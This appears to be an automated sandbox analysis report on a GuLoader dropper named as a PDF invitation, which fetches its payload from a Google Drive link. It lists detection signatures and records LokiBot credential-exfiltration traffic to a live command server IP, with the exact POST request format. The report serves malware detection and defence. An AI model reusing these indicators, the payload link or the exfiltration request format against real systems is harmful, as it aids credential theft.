Windows Analysis Report Anexo I e II do convite#U00b7pdf.exe

Overview

General Information

Sample Name:	Anexo I e II do convite#U00b7pdf.exe
Analysis ID:	531208
MD5:	e779a8be256d298c6d96884724d7792b
SHA1:	5ff1cb154e5001791e3dd019721462fe20bfec80
SHA256:	9dbfeb5b6cdf7f40899f2f36ecd59d8c1f72ec680248e4b42f69496c61b5d19c
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Potential malicious icon found

Multi AV Scanner detection for submitted file

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Creates processes with suspicious names

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id="}

Multi AV Scanner detection for submitted file

Source: Anexo I e II do convite#U00b7pdf.exe

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Source: Anexo I e II do convite#U00b7pdf.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.1.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.3.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 13.0.Anexo I e II do convite#U00b7pdf.exe.400000.2.unpack	Avira: Label: TR/Dropper.VB.Gen
Source: 0.2.Anexo I e II do convite#U00b7pdf.exe.400000.0.unpack	Avira: Label: TR/Dropper.VB.Gen

Compliance:

Uses 32bit PE files

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49748 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49749 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49752 -> 63.250.34.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 63.250.34.171 63.250.34.171

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 163Connection: close

Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:02 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:05 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 30 Nov 2021 14:34:09 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171

Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.394429524.000000000092A000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419336698.0000000000920000.00000004.00000020.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.422738792.000000001E5CC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392139154.0000000000936000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-14-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419287204.00000000008C7000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/i
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000003.392422082.0000000000932000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQhb_RBrBtzpisGKe78
Source: Anexo I e II do convite#U00b7pdf.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

HTTP traffic detected: POST /tickets.php?id=156 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 413CA904Content-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/iol8p470gcqqh0o2bl4lp5jq2phtn0nr/1638282825000/17938877548982121299/*/1woW1V-Fwjjb6G5mIgMHVwoyywXrCNcHQ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-14-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 216.58.209.46:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.129:443 -> 192.168.2.3:49747 version: TLS 1.2

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Uses 32bit PE files

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Detected potential crypto function

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A269B	0_2_020A269B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C	0_2_020A942C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEEF5	0_2_020AEEF5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A820F	0_2_020A820F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD26B	0_2_020AD26B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A826F	0_2_020A826F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7263	0_2_020A7263
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A72A3	0_2_020A72A3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD2E3	0_2_020AD2E3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A82FB	0_2_020A82FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD343	0_2_020AD343
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A835F	0_2_020A835F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4364	0_2_020A4364
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A83CB	0_2_020A83CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD3F7	0_2_020AD3F7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD02E	0_2_020AD02E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE033	0_2_020AE033
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD05B	0_2_020AD05B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE062	0_2_020AE062
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8067	0_2_020A8067
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE08F	0_2_020AE08F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9099	0_2_020A9099
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A70A8	0_2_020A70A8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A80BB	0_2_020A80BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD0BF	0_2_020AD0BF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A90CF	0_2_020A90CF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD103	0_2_020AD103
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A912B	0_2_020A912B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7127	0_2_020A7127
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8130	0_2_020A8130
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD15F	0_2_020AD15F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AA17B	0_2_020AA17B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE177	0_2_020AE177
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A81BB	0_2_020A81BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD1DB	0_2_020AD1DB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7643	0_2_020A7643
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AB645	0_2_020AB645
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A76B3	0_2_020A76B3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7723	0_2_020A7723
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A77B8	0_2_020A77B8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AF7D5	0_2_020AF7D5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE431	0_2_020AE431
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A945F	0_2_020A945F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8463	0_2_020A8463
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0494	0_2_020A0494
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE4A7	0_2_020AE4A7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A94C3	0_2_020A94C3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AC4EB	0_2_020AC4EB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A84FB	0_2_020A84FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A750E	0_2_020A750E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE517	0_2_020AE517
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9523	0_2_020A9523
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8547	0_2_020A8547
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7552	0_2_020A7552
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A85CB	0_2_020A85CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9A53	0_2_020A9A53
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7A6F	0_2_020A7A6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0AB8	0_2_020A0AB8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9AD7	0_2_020A9AD7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7AE7	0_2_020A7AE7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB37	0_2_020ADB37
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9B44	0_2_020A9B44
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB6F	0_2_020ADB6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7BA3	0_2_020A7BA3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADBC7	0_2_020ADBC7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADBFF	0_2_020ADBFF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7807	0_2_020A7807
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A788B	0_2_020A788B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A790F	0_2_020A790F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A796E	0_2_020A796E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7963	0_2_020A7963
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7974	0_2_020A7974
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A99DB	0_2_020A99DB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A79FB	0_2_020A79FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7E6F	0_2_020A7E6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7EE3	0_2_020A7EE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADEF7	0_2_020ADEF7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEF2F	0_2_020AEF2F
